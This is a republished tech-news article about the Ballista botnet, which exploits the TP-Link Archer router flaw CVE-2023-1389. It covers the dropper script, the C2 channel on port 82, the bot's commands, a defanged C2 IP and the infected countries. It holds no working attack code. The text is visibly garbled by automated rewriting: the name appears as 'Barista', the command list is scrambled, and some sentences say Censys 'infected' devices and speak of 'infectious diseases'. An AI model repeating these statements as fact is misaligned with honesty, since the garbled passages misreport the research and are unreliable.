Close Menu
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
What's Hot

Tamu Cri expands innovative cosmic radiation detectors

Russian bulletproof hosting provider to support cybercriminals behind US sanctions ransomware

How the US tackles the threat of PFAS chemicals

Facebook X (Twitter) Instagram
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
Facebook X (Twitter) Instagram
Fyself News
  • Home
  • Identity
  • Inventions
  • Future
  • Science
  • Startups
  • Spanish
Fyself News
Home » Ballista Botnet Exploits Patched TP-Link Vulnerability Infects Over 6,000 Devices
Identity

Ballista Botnet Exploits Patched TP-Link Vulnerability Infects Over 6,000 Devices

userBy userMarch 11, 2025No Comments3 Mins Read
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

March 11, 2025Ravi LakshmananNetwork Security/Vulnerabilities

Barista Botnet

New research from the CATO CTRL team shows that unpatched TP-Link Archer routers are the target of a new botnet campaign called Ballista.

“Botnets will automatically spread across the Internet by leveraging a remote code execution (RCE) vulnerability in TP-Link Archer Routers (CVE-2023-1389),” said security researchers in a technical report shared with Hacker News.

CVE-2023-1389 is a high-strength security flaw affecting TP-link Archer AX-21 routers that can lead to command injection, and could pave the way for remote code execution.

The earliest evidence of the aggressive exploitation of the flaw dates back to April 2023, when an unidentified threat actor uses it to remove the Mirai Botnet malware. Since then, it has been abused to propagate other malware families such as Condi and Androxgh0st.

Cybersecurity

Cato Ctrl said it detected the Ballista campaign on January 10, 2025. The most recent attempts at exploitation were recorded on February 17th.

The attack sequence involves the use of a malware dropper, a shell script (“Dropbpb.sh”) designed to retrieve and execute the main binaries of the target system for various system architectures, such as MIP, Mipsel, ARMV5L, ARMV7L, X86_64.

When executed, the malware establishes an encrypted Command and Control (C2) channel on port 82 to control the device.

“This will allow the running shell commands to carry out additional RCE and denial of service (DOS) attacks,” the researchers said. “In addition, malware attempts to read sensitive files on the local system.”

Barista Botnet

Some of the supported commands are listed below –

Flulder, which triggers flood attack exploits CVE-2023-1389 start. This is an optional parameter used with the exploiter to start a module, stopping the module trigger shell that triggers the function shell that the module executes Linux shell commands on the local system. Killall is used to terminate the service

Additionally, it can terminate previous instances of itself and erase its own existence when execution begins. It is also designed to spread to other routers by attempting to exploit the flaws.

Cybersecurity

Using C2 IP address location (2.237.57[.]70) and the presence of Italian strings in malware binaries suggests the involvement of unknown Italian threat actors, the cybersecurity company said.

That said, considering that IP addresses are no longer working and there are new variants of droppers that use TOR network domains instead of hardcoded IP addresses, it appears that malware is in active development.

A search for the Attack Surface Management Platform revealed that Censys has infected over 6,000 devices in Ballista. Infectious diseases are concentrated in Brazil, Poland, the UK, Bulgaria and Türkiye.

Botnets are known to target manufacturing, healthcare, services, and technology organizations in the United States, Australia, China and Mexico.

“The malware sample shares similarities with other botnets, but it’s different from widely used botnets like Mirai and Mozi,” the researchers said.

Did you find this article interesting? Follow us on Twitter and LinkedIn to read exclusive content you post.

Source link

Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticlePPDS Hit Sustainability Milestone Epeat Climate+ Gold for PhilipsEcodeSign
Next Article Hong Kong Reclear will prison social workers over their role in the 2019 protest | Political News
user
  • Website

Related Posts

Russian bulletproof hosting provider to support cybercriminals behind US sanctions ransomware

July 2, 2025

Vercel’s V0AI tool weaponized by cybercriminals quickly creates fake login pages at scale

July 2, 2025

Anthropic MCP Critical Vulnerability Exposes Developer Machines to Remote Exploits

July 1, 2025
Add A Comment
Leave A Reply Cancel Reply

Latest Posts

Tamu Cri expands innovative cosmic radiation detectors

Russian bulletproof hosting provider to support cybercriminals behind US sanctions ransomware

How the US tackles the threat of PFAS chemicals

Vercel’s V0AI tool weaponized by cybercriminals quickly creates fake login pages at scale

Trending Posts

Subscribe to News

Subscribe to our newsletter and never miss our latest news

Please enable JavaScript in your browser to complete this form.
Loading

Welcome to Fyself News, your go-to platform for the latest in tech, startups, inventions, sustainability, and fintech! We are a passionate team of enthusiasts committed to bringing you timely, insightful, and accurate information on the most pressing developments across these industries. Whether you’re an entrepreneur, investor, or just someone curious about the future of technology and innovation, Fyself News has something for you.

Unlocking the Power of Prediction: The Rise of Digital Twins in the IoT World

TwinH: Digital Human Twin Aims for Victory at Break the Gap 2025

The Digital Twin Revolution: Reshaping Industry 4.0

1-inch rollout expanded bug bounty features rewards up to $500,000

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • About Us
  • Advertise with Us
  • Contact Us
  • DMCA
  • Privacy Policy
  • Terms & Conditions
  • User-Submitted Posts
© 2025 news.fyself. Designed by by fyself.

Type above and press Enter to search. Press Esc to cancel.